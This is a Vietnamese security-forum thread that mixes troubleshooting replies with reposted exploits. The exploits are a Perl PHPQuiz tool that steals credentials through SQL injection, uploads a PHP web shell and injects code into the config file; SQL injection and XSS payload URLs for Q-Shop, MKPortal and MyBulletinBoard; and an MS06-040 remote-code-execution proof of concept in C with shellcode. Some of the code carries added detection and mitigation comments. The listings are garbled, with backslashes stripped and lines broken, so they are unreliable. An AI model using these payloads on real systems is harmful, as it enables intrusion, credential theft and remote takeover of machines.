|
|
Theo microsoft:
Group Policy processing does not work and events 1030 and 1058 are logged in the Application log of a domain controller
Full info: http://support.microsoft.com/kb/842804
Thân
|
|
|
Đúng như anh conmale, site bạn dính XSS nhiều quá, cái phần "Nhật Ký" bị khá nhiều, vui lòng check kỹ lại code.
Thân
|
|
|
Check và PM
Thân
|
|
|
Không hiểu sao server này mở rất nhiều port thế?
Thông tin lỗi tôi sẽ PM bạn.
Thân
|
|
|
Nếu db dung lượng ít thì dùng tool của forum hoặc phpmyadmin backup, còn nếu lớn hơn khoảng 100MB thì tốt nhất dùng SSH. Bạn nên hỏi host có hỗ trợ SSH hay không.
|
|
|
Code:
######################################################
#
# Title: PHPQuiz <= v.1.2 Remote SQL injection/Code Execution Exploit
# Vendor : PHPQuiz
# webiste : http://www.phpquiz.com
# Version : <= v.1.2
# Severity: Critical
# Author: Simo64 / simo64_at_morx_org
# MorX Security Reseach Team
# http://www.morx.org
# http://www.morx.org/phpquiz.txt
#
# Details :
#
# SQL injection in score.php
#***************************
#
# The univers variable in score.php and the quiz_id variable in home.php are not properly validated and can be used to inject SQL into the query
#
# PoC : http://localhost/phpquiz/front/?what=score&univers=[SQL]
# http://localhost/phpquiz/front/?quiz=quiz&univers=1&step=1&quiz_id=[SQL]
#
# Arbitrary File Upload
#**********************
# vulnerable code in back/upload_img.php and admin/upload_img.php near lines 74-76
#
# 74 if (($upload) && ($ok_update == "yes")) {
# 75
# 76 if(@copy($image, $path)){
# 77 .....
#
# $upload , $ok_update , $image , $path variables are not sanitized and can be used to upload files
#
# PoC Exploit :
#
# <form enctype="multipart/form-data" method="post" action="http://localhost/phpquiz/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/l3ez.php">
# Download File<br>
# <input name="image" type="file" size="20"><br>
# <input type="submit" name="upload" value="Upload"><form>
#
# The phpquiz/img_quiz/ folder is writable by default, so after uploading a simple PHP shell <?passthru($cmd);?>
#
# commands can be launched from : http://localhost/phpquiz/img_quiz/l3ez.php?cmd=ls
#
# PHP Code Injection
#********************
#
# cfgphpquiz/install.php is accessible without authentication; the script is used to
# save configuration settings in config.inc.php.
#
# Impact:
# any remote user can post PHP code to the vulnerable file and view the current configuration, which contains sensitive information
# such as the admin password (plain text) and login
#
#***********************************************************************************
#
# simo64@localhost:~$ phpquiz.pl morx.org /phpquiz/ 1
#
# /-----------------------------------------------------------
# | PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |
# | Coded by simo64 - simo64_morx.org |
# | www.morx.org |
# |-----------------------------------------------------------|
# | MorX Security Research Team © |
# -----------------------------------------------------------/
#
# Connecting to www.morx.org ... Connected !
#
# [+] Injecting credentials
#
# Sending Data ...
#
# SQL injection Succeded !
#
# User EMail : <a href="mailto:admin@morx.org">admin@morx.org</a>
# User Login : admin
# User Passwd : password
#
# [+] Exec CMD by uploading a shell Connected !
#
# Uploading shell ... [OK]
#
# Checking if successfully Uploaded .... [OK]
#
# NOW YOU CAN LAUNCH COMMANDS
#
# simo64[at]morx.org :~$ id
# uid=48(apache) gid=48(apache) groups=48(apache),2522(psaserv)
# simo64[at]morx.org :~$ pwd
# /home/morx/public_html/phpquiz/img_quiz
# simo64[at]morx.org :~$ ls
# id_1.gif
# id_2.gif
# id_3.gif
# id_4.gif
# index.php
# zaz.php
# simo64[at]morx.org :~$ exit
#
#!/usr/bin/perl
use IO::Socket ;
use LWP::Simple ;
# Start-up section: banner, usage text, argument handling and the request
# strings used by the three stages further down.
# NOTE(review): the listing is extraction-damaged and is not valid Perl as
# printed; read it as a record of the request pattern, not as a program.
print q(
/-----------------------------------------------------------
| PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |
| Coded by simo64 - simo64_morx.org |
| www.morx.org |
|-----------------------------------------------------------|
| MorX Security Research Team © |
-----------------------------------------------------------/
);
# Prints the expected arguments: host, application path, numeric user id.
sub usage(){
print "nUsage :perl $0 siteurl /path/ useridn";
print "nExemple : perl $0 phpquiz.com /phpquiz/ 1n";
}
# Only an empty argument list is rejected; the three values are used unchecked.
if(!@ARGV){
&usage();
exit(0)
}
$host = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];
# Bareword: without "use strict" this is the string "null", not undef.
$success = null ;
$injected = 0;
# Request targets for the stages below.
#   $injcheck   - fetches cfgphpquiz/config.inc.php with a marker value (l3fou)
#                 that stage 3 looks for in the response.
#   $phpinject  - calls cfgphpquiz/install.php with a config_alert_email_name
#                 value that starts with an encoded quote and semicolon and
#                 then carries PHP statements; the advisory header says
#                 install.php needs no authentication and writes config.inc.php.
#   $inject*    - UNION SELECT against the user table (LOGIN, PWD and EMAIL
#                 columns) through the univers parameter of front/?what=score,
#                 for the user id given on the command line.
# Detection: all of this is visible in web access logs - "univers=" carrying
# UNION/SELECT, any request to cfgphpquiz/install.php after setup, and
# config.inc.php requested with a query string.
# Mitigation: cast univers and quiz_id to integers or bind them as query
# parameters; remove or access-restrict install.php once installation is done.
$injcheck = $path."cfgphpquiz/config.inc.php?xD=l3fou";
$phpinject = $path."cfgphpquiz/install.php?submit=Valider&config_alert_email_name=%22;echo%20@$xD;@system($morx);//MorX%20RulZ%20=)";
$injectuser = "front/?what=score&univers=-64%20UNION%20SELECT%20null,LOGIN,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";
$injectpass = "front/?what=score&univers=-64%20UNION%20SELECT%20null,PWD,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";
$injectmail = "front/?what=score&univers=-64%20UNION%20SELECT%20null,EMAIL,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";
# Stage 1: read one user's e-mail, login and password through the SQL
# injection in the univers parameter. Each value is fetched with its own
# HTTP request over a fresh TCP connection to port 80.
syswrite STDOUT , "Connecting to $host ...";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "nnUnable to connect to $host " unless($sock) ;
syswrite STDOUT , "tConnected !nn[+] Injecting credentialsnnSending Data ...";
print $sock "GET $path$injectmail HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Connection: Closenn";
# The e-mail is taken from the quoted text that follows anim_fleche_droite.gif
# in the response; a match is what marks the stage as successful.
while($res = <$sock>){
if($res =~ /anim_fleche_droite.gif" border="0"> "(.*?)"</a>/){
$usermail = $1 ;
$success = "ok" ;
}
}
if($success eq "ok") {
syswrite STDOUT , "nnSQL injection Succeded !nn";
sleep 2 ;
syswrite STDOUT , "tUser EMail : $usermailn";
# Login: the last > "..." match in the response wins. This connection and the
# next one are not checked for failure before use.
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "GET $path$injectuser HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Connection: Closenn";
while($res = <$sock>){
if($res =~ /> "(.*?)"/){
$userlogin = $1 ;
}
}
syswrite STDOUT , "tUser Login : $userloginn";
# Password: the PWD column is printed exactly as the query returns it.
# NOTE(review): if the user table stores passwords unhashed this discloses
# them directly - confirm the storage format when assessing impact.
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "GET $path$injectpass HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Connection: Closenn";
while($res = <$sock>){
if($res =~ /> "(.*?)"/){
$userpass = $1 ;
}
}
syswrite STDOUT , "tUser Passwd : $userpassnn";
} else {print "nnInjecting credentials Exploit Failed !nn";}
# Execution continues with the upload stage whether or not stage 1 matched.
sleep 2;
# PART2 Remote command execution by uploading a shell
# Stage 2: file upload through back/upload_img.php. The script sends no
# session or credential with the request.
# Detection: POST requests to back/upload_img.php (the advisory header also
# lists admin/upload_img.php) with upload, ok_update and path in the query
# string; a new .php file appearing under img_quiz/; GET requests to
# img_quiz/*.php carrying a cmd parameter.
# Mitigation: require an authenticated session in the upload script, derive the
# destination name on the server instead of taking it from the request, accept
# image types only, and disable PHP execution inside img_quiz/.
syswrite STDOUT , "n[+] Exec CMD by uploading a shell";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "nnUnable to connect to $host " unless($sock) ;
syswrite STDOUT , "tConnected !nn";
syswrite STDOUT , "Uploading shell ...";
# Multipart body: a "dir" field, the "image" file part named zaz.php (a PHP
# file that hands its cmd parameter to passthru) and the "submit" field.
$data='-----------------------------7d61592213049c
Content-Disposition: form-data; name="dir"
/
-----------------------------7d61592213049c
Content-Disposition: form-data; name="image"; filename="zaz.php"
Content-Type: text/plain
<?php
if (get_magic_quotes_gpc()){$_GET['cmd']=stripslashes($_GET['cmd']);}
passthru($_GET['cmd']);
?>
-----------------------------7d61592213049c
Content-Disposition: form-data; name="submit"
Upload
-----------------------------7d61592213049c--
';
# The destination comes from the path query parameter, which is why the file
# lands in img_quiz/ under a .php name.
$script = $path."/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/zaz.php";
$len = length $data ;
print $sock "POST $script HTTP/1.0rn";
print $sock "Content-Type: multipart/form-data; boundary=---------------------------7d61592213049crn";
print $sock "Host: $hostrn";
print $sock "Content-Length: $lenrn";
print $sock "Connection: closernrn";
print $sock $data;
syswrite STDOUT , "t[OK]nnChecking if successfully Uploaded .... ";
# Verification: a HEAD request for the uploaded file; a response line matching
# the 200 status sets $success, a variable shared with stage 1.
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "HEAD $path"."img_quiz/zaz.php HTTP/1.0rn";
print $sock "Host: $hostrn";
print $sock "Connection: closenn";
while($rep = <$sock>){
if($rep =~ /HTTP/1.1 200 OK/) { $success = 1; }
}
if($success == 1){
print "t[OK]nnttNOW YOU CAN LAUNCH COMMANDSnn";
# Each line read from STDIN is appended as the cmd parameter of a GET request.
# Only "exit" leaves this loop, and it ends the program, so the code after
# this block runs only when the upload check failed.
while(){
print "simo64[at]morx.org :~$ ";
chop($cmd=<STDIN>);
exit() if ($cmd eq 'exit');
$result = get("http://$host".$path."img_quiz/zaz.php?cmd=$cmd");
print $result;
}
}
else { print "tFailed !nnFile Upload Failednn" }
# STEP 3 Injecting PHP code into the config.inc.php file
# Reached only when the upload check above did not succeed. Uses the
# unauthenticated cfgphpquiz/install.php described in the advisory header.
# Detection: the fixed User-Agent value sent below, install.php requests
# carrying config_alert_email_name, a changed config.inc.php, and
# config.inc.php requested directly with xD= or morx= parameters.
# Mitigation: delete or access-restrict cfgphpquiz/install.php after setup and
# keep config.inc.php non-writable by the web server where the application
# allows it.
print "n[+] Injecting PHP Code......nnConnecting ....";
my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "Connot Connect to $host !" unless($sock);
print "tConnected !nnSending Data ....t";
# The install.php request is sent; its response is never read.
print $sock "GET $phpinject HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "User-Agent: MorX-Zillan";
print $sock "Connection: Closenn";
print "t OKnnChecking if code injected ...";
# Check: request config.inc.php with the xD=l3fou marker and look for the
# marker text in any response line. This connection is not checked for failure.
my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "GET $injcheck HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "User-Agent: MorX-Zillan";
print $sock "Connection: Closenn";
while($check = <$sock>){
if($check =~ /l3fou/) { $injected = 1; }
}
if($injected == 1 ){
print "tSucceded !nntNOW YOU ARE IN !nn";
# Lines from STDIN are sent to config.inc.php through the morx parameter
# until "exit" is typed.
while(){
print "simo@morx.org :~$ ";
$cmd = <STDIN>;
chop($cmd);
exit(0) if($cmd eq "exit");
$result = get("http://".$host.$path."cfgphpquiz/config.inc.php?morx=$cmd");
print $result;
}
}
else {print "tFailednnPHPCode Injection Failed !nn";}
#
|
|
|
*************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://quadcomm.com
# Exploit;
*************************************************************
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
# ajann,Turkey
# ...
|
|
|
Lần sau tìm kiếm kỹ trước khi hỏi
Thân
|
|
|
Máy của cậu có cài Visual Basic ko?
|
|
|
Tôi nhớ cái thông báo error còn khúc sau nữa. Bạn phải có quyền admin mới cài được.
|
|
|
Có lẽ máy nhiễm trojan Troj/Brave-A
Reboot ở Safe Mode và run http://download.hijackthis.eu/hijackthis_199.zip
Kiểm tra những cái này trong HijackThis.
(Lưu ý: Nếu R* không hiện trong Safe Mode, re-run HiJackThis ở chế độ bình thường và xoá nó sau khi bạn xoá những cái sau. Đây là log mà lúc trước máy tôi bị nhiễm)
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://g.msn.com/0SEENUS/SAOS01
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = about:blank
O2 - BHO: PynixObj Class - {00000000-DD60-0064-6EC2-6E0100000000} - C:\WINNT\Pynix.dll
O2 - BHO: (no name) - {38D4D5D0-423E-4220-B6F9-30918C2AE4A4} - C:\WINNT\sasetup.dll
O2 - BHO: (no name) - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - (no file)
O2 - BHO: Cls - {CF021F40-3E14-23A5-CBA2-7173706D1316} - C:\WINNT\System32\spm1316.dll (file missing)
O2 - BHO: Cls - {CF021F40-3E14-23A5-CBA2-717765723548} - C:\WINNT\System32\wer3548.dll
O4 - HKLM\..\Run: [farmmext] C:\WINNT\farmmext.exe
O4 - HKLM\..\Run: [mtdiyd] c:\winnt\system32\mtdiyd.exe
O4 - HKLM\..\RunOnce: [Local runole service] C:\WINNT\System32\srvc32.exe
O4 - HKLM\..\RunOnce: [Srv32 spool service] C:\WINNT\System32\spoolsrv32.exe
O4 - HKCU\..\RunOnce: [Local runole service] C:\WINNT\System32\srvc32.exe
O4 - HKCU\..\RunOnce: [Srv32 spool service] C:\WINNT\System32\spoolsrv32.exe
Đóng tất cả cửa sổ ngoại trừ HijackThis và nhấn Fix.
Và trong Safe Mode, delete những cái sau: (nên show hidden files)
(C:\Windows\ hoặc C:\Windows\System32\)
\farmmext.exe
\system32\mtdiyd.exe
\System32\srvc32.exe
\System32\spoolsrv32.exe
Reboot lại xem thử.
Mà tốt nhất cậu scan rồi post file log lên để tôi check sơ.
|
|
|
Vấn đề này tôi gặp là do lỗi copy cả file autorun trong USB qua đè lên autorun trong máy (do Ctrl+A -> Copy -> Paste)
Giờ thì
+ Vô Folder Options-> View --> Show Hidden Files and Folder
+ Bỏ chọn ô Hide protected operating system files -> OK
Nhìn vào ổ C/D sẽ xuất hiện 1 file là autorun.exe. Xóa file đó đi, rồi Log Off hoặc Restart. Set lại mấy options trong Folder Option như cũ.
|
|
|
Khi hỏi cũng không ghi rõ main loại gì làm sao giúp. Thử load lại default của nó xem.
|
|
|
Thử vô SafeMode xoá, nếu xoá xong mà vô lại win vẫn còn thì scan virus xem sao
Thân
|
|
|
XSS in MKPortal M1.1 Rc1
info:
file:index.php
google======>MKPortal M1.1 Rc1 ©2003-2005
Exp:
http://www.sitename.com/index.php?ind="><script>alert(1);</script>
--------------------------------------
By Crack_man
|
|
|
Check here:
http://www.zhangduo.com/driverbackup.html
|
|
|
Code:
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Aug 30 2006 12:00AM
Updated: Aug 30 2006 06:23PM
Credit: imei addmimistrator is credited with the discovery of this vulnerability.
Vulnerable:
MyBulletinBoard MyBulletinBoard 1.1.7
MyBulletinBoard MyBulletinBoard 1.1.6
MyBulletinBoard MyBulletinBoard 1.1.5
MyBulletinBoard MyBulletinBoard 1.1.4
MyBulletinBoard MyBulletinBoard 1.1.3
MyBulletinBoard MyBulletinBoard 1.1.2
MyBulletinBoard MyBulletinBoard 1.1.1
MyBulletinBoard MyBulletinBoard 1.1
MyBulletinBoard MyBulletinBoard 1.0.4
MyBulletinBoard MyBulletinBoard 1.0.3
MyBulletinBoard MyBulletinBoard 1.0.2
MyBulletinBoard MyBulletinBoard 1.0.1
MyBulletinBoard MyBulletinBoard 1.0 PR2
MyBulletinBoard MyBulletinBoard 1.0
Not Vulnerable:
MyBulletinBoard MyBulletinBoard 1.1.8
This issue can be exploited through a web client.
An example URI has been provided:
http://www.example.com/admin/index.php?_SERVER[PHP_SELF]=http://www.example.com
|
|
|
Hi
Mình từng đi cài nhiều dv internet cho bạn bè, dùng DF Enterprise. Thỉnh thoảng vẫn bị sự cố như vậy. Đôi khi lại do dây cáp cắm vào HDD không chặt. Nhưng nếu bạn dùng máy ở nhà thì không nên dùng DF, không tốt cho ổ cứng đâu.
|
|
|
Và nhớ chuẩn bị thêm, không chỉ có mất file system32\hal.dll mà sau khi bạn copy thì sẽ báo thiếu thêm vài file nữa
|
|
|
Rated as : Critical
Code:
/*
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
* Windows XP SP1
* Windows 2000 SP4
*
* Systems Affected:
* Microsoft Windows 2000 SP0-SP4
* Microsoft Windows XP SP0-SP1
* Microsoft Windows NT 4.0
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* PRIVATE v.0.2 (08-27-06)
*/
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
// Fixed protocol blobs sent over the named pipe by main().
// Defender note: these bytes do not vary between runs, so they are the parts a
// network signature can key on - the interface UUID in the bind (third row,
// stored little-endian) and operation number 0x1f in the request header.
// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
"x05x00x0Bx03x10x00x00x00x48x00x00x00x00x00x00x00"
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
"xC8x4Fx32x4Bx70x16xD3x01x12x78x5Ax47xBFx6ExE1x88"
"x03x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
"x2Bx10x48x60x02x00x00x00";
// request windows api: NetprPathCanonicalize (0x1f)
// Header only; main() copies it to the start of the request buffer and then
// fills in the count fields and the path data behind it.
unsigned char DCERPC_Request_RPC_Service[] =
"x05x00x00x03x10x00x00x00x30x08x00x00x00x00x00x00"
"x18x08x00x00x00x00x1fx00xffxffxffxffx01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00";
// path ...
// Trailing fields that main() copies in after the path data.
unsigned char DCERPC_Request_RPC_Service_[] =
"xfax00x00x00x02x00x00x00x00x00x00x00x02x00x00x00"
"x00x00x00x00xfax00x00x00x00x00x00x00";
unsigned char sc[] =
"x6ax51x59xd9xeexd9x74x24xf4x5bx81x73x13xa8x97x90"
"x88x83xebxfcxe2xf4x29x53x6fx67x57x68xd4x74xc2x7c"
"xddx60x51x68x6fx77xc8x1cxfcxacx8cx1cxd5xb4x23xeb"
"x95xf0xa9x78x1bxc7xb0x1cxcfxa8xa9x7cxd9x03x9cx1c"
"x91x66x99x57x09x24x2cx57xe4x8fx69x5dx9dx89x6ax7c"
"x64xb3xfcxb3xb8xfdx4dx1cxcfxacxa9x7cxf6x03xa4xdc"
"x1bxd7xb4x96x7bx8bx84x1cx19xe4x8cx8bxf1x4bx99x4c"
"xf4x03xebxa7x1bxc8xa4x1cxe0x94x05x1cxd0x80xf6xff"
"x1exc6xa6x7bxc0x77x7exf1xc3xeexc0xa4xa2xe0xdfxe4"
"xa2xd7xfcx68x40xe0x63x7ax6cxb3xf8x68x46xd7x21x72"
"xf6x09x45x9fx92xddxc2x95x6fx58xc0x4ex99x7dx05xc0"
"x6fx5exfbxc4xc3xdbxfbxd4xc3xcbxfbx68x40xeexc0x86"
"xccxeexfbx1ex71x1dxc0x33x8axf8x6fxc0x6fx5exc2x87"
"xc1xddx57x47xf8x2cx05xb9x79xdfx57x41xc3xddx57x47"
"xf8x6dxe1x11xd9xdfx57x41xc0xdcxfcxc2x6fx58x3bxff"
"x77xf1x6exeexc7x77x7exc2x6fx58xcexfdxf4xeexc0xf4"
"xfdx01x4dxfdxc0xd1x81x5bx19x6fxc2xd3x19x6ax99x57"
"x63x22x56xd5xbdx76xeaxbbx03x05xd2xafx3bx23x03xff"
"xe2x76x1bx81x6fxfdxecx68x46xd3xffxc5xc1xd9xf9xfd"
"x91xd9xf9xc2xc1x77x78xffx3dx51xadx59xc3x77x7exfd"
"x6fx77x9fx68x40x03xffx6bx13x4cxccx68x46xdax57x47"
"xf8x67x66x77xf0xdbx57x41x6fx58";
/*
 * Entry point. Usage, from the text printed below: ms06040poc <host> [target],
 * where target 1 selects the Windows 2000 request layout and 2 the Windows XP
 * one.
 *
 * Flow as written: build szReqBuf for the chosen target, attach to the
 * host's ipc$ share with empty user name and password strings, open the
 * host's "browser" named pipe, send the bind blob with TransactNamedPipe,
 * write the request, then tell the operator to look at TCP port 4444 on the
 * host. Returns 0 once the request has been written and -1 on a usage,
 * connection, pipe or write error.
 *
 * NOTE(review): this listing is extraction-damaged (several literals and
 * comments are wrapped across lines) and does not compile as printed.
 *
 * Detection: a credential-less session to IPC$ followed by an open of the
 * browser pipe, a bind to the interface UUID named above
 * DCERPC_Bind_RPC_Service, a NetprPathCanonicalize (0x1f) request with an
 * unusually long path argument, and a later connection to TCP 4444.
 * Mitigation: install the update from bulletin MS06-040 named in the file
 * header and keep SMB named pipes unreachable from untrusted networks
 * (NOTE(review): confirm the exact fixed builds against the bulletin).
 */
int main(int argc, char* argv[])
{
HANDLE hFile;
NETRESOURCE nr;
char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];
unsigned int i;
unsigned char szInBuf[4096];
unsigned long dwRead, nWritten;
unsigned char szReqBuf[2096];
// Both the host and the target selector are required.
if (argc < 3){
printf("[-] Usage: ms06040poc <host>
[target]n");
printf("t1 - Windows 2000 SP0-SP4n");
printf("t2 - Windows XP SP0-SP1n");
return -1;
}
// Start from an all-zero request; at most one of the two branches below fills
// it, and any other selector value leaves it zeroed.
memset(szReqBuf, 0, sizeof(szReqBuf));
// Target 1 (Windows 2000 per the usage text): the path data is filler, the sc
// bytes, and a repeated 4-byte value; the offsets are hard-coded for this
// target.
if (atoi(argv[2]) == 1) {
unsigned char szBuff[1064];
// build payload buffer
memset(szBuff, 'x90', 1000);
memcpy(szBuff+630, sc, sizeof(sc));
for(i=1000; i<1064; i+=4) {
memcpy(szBuff+i, "x04x08x02x00", 4);
}
// build request buffer
memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
memcpy(szReqBuf+44, "x15x02x00x00", 4); /*
max count */
memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
memcpy(szReqBuf+52, "x15x02x00x00", 4); /*
actual count */
memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
memcpy(szReqBuf+1120, "x00x00x00x00", 4); /*
align string */
memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
memcpy(szReqBuf+1140 , "xebx02", 2);
}
// Target 2 (Windows XP per the usage text): same request header and trailer,
// with a shorter path buffer and different hard-coded offsets.
if (atoi(argv[2]) == 2) {
unsigned char szBuff[708];
memset(szBuff, 'x90', 612); /* size of shellcode */
memcpy(szBuff, sc, sizeof(sc));
memcpy(szBuff+612, "x0ax08x02x00", 4);
memset(szBuff+616, 'A', 8); // 8 bytes padding
memcpy(szBuff+624, "x04x08x02x00", 4);
memset(szBuff+628, 'x90', 32);
memcpy(szBuff+660, "x04x08x02x00", 4);
memset(szBuff+664, 'B', 8); // 8 bytes padding
memcpy(szBuff+672, "x04x08x02x00", 4);
memset(szBuff+676, 'x90', 32);
// build request buffer
memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
memcpy(szReqBuf+44, "x63x01x00x00", 4); /*
max count */
memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
memcpy(szReqBuf+52, "x63x01x00x00", 4); /*
actual count */
memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
memcpy(szReqBuf+764, "x00x00x00x00", 4); /*
align string */
memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
}
printf("[+] Connecting to %s ... n", argv[1]);
// Remote name of the host's ipc$ share for WNetAddConnection2.
_snprintf(szRemoteName, sizeof(szRemoteName),
"\\%s\ipc$", argv[1]);
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.lpRemoteName = szRemoteName;
// Empty strings are passed for both the password and the user name, i.e. the
// session is attempted without credentials (NOTE(review): confirm how the
// target build treats this).
if (WNetAddConnection2(&nr, "", "", 0) !=
NO_ERROR) {
printf("[-] Failed to connect to host !n");
return -1;
}
// Open the browser named pipe on the same host for read and write.
_snprintf(szPipePath, sizeof(szPipePath),
"\\%s\pipe\browser", argv[1]);
hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf("[-] Failed to open named pipe !n");
return -1;
}
printf("[+] Binding to RPC interface ... n");
// Send the bind blob and read the reply into szInBuf; the reply content is
// not inspected, only the call's success.
if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service,
sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL)
== 0) {
printf("[-] Failed to bind to interface !n");
CloseHandle(hFile);
return -1;
}
printf("[+] Sending RPC request ... n");
// The whole 2096-byte buffer is written, including any unused zero tail.
if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
printf("[-] Unable to transmit RPC request
!n");
CloseHandle(hFile);
return -1;
}
// No response is read and the outcome is not verified here. On this path the
// pipe handle is not closed, and the network connection is never cancelled on
// any path.
printf("[+] Now check for shell on %s:4444 !n",
argv[1]);
return 0;
}
|
|
|
|
|
|
|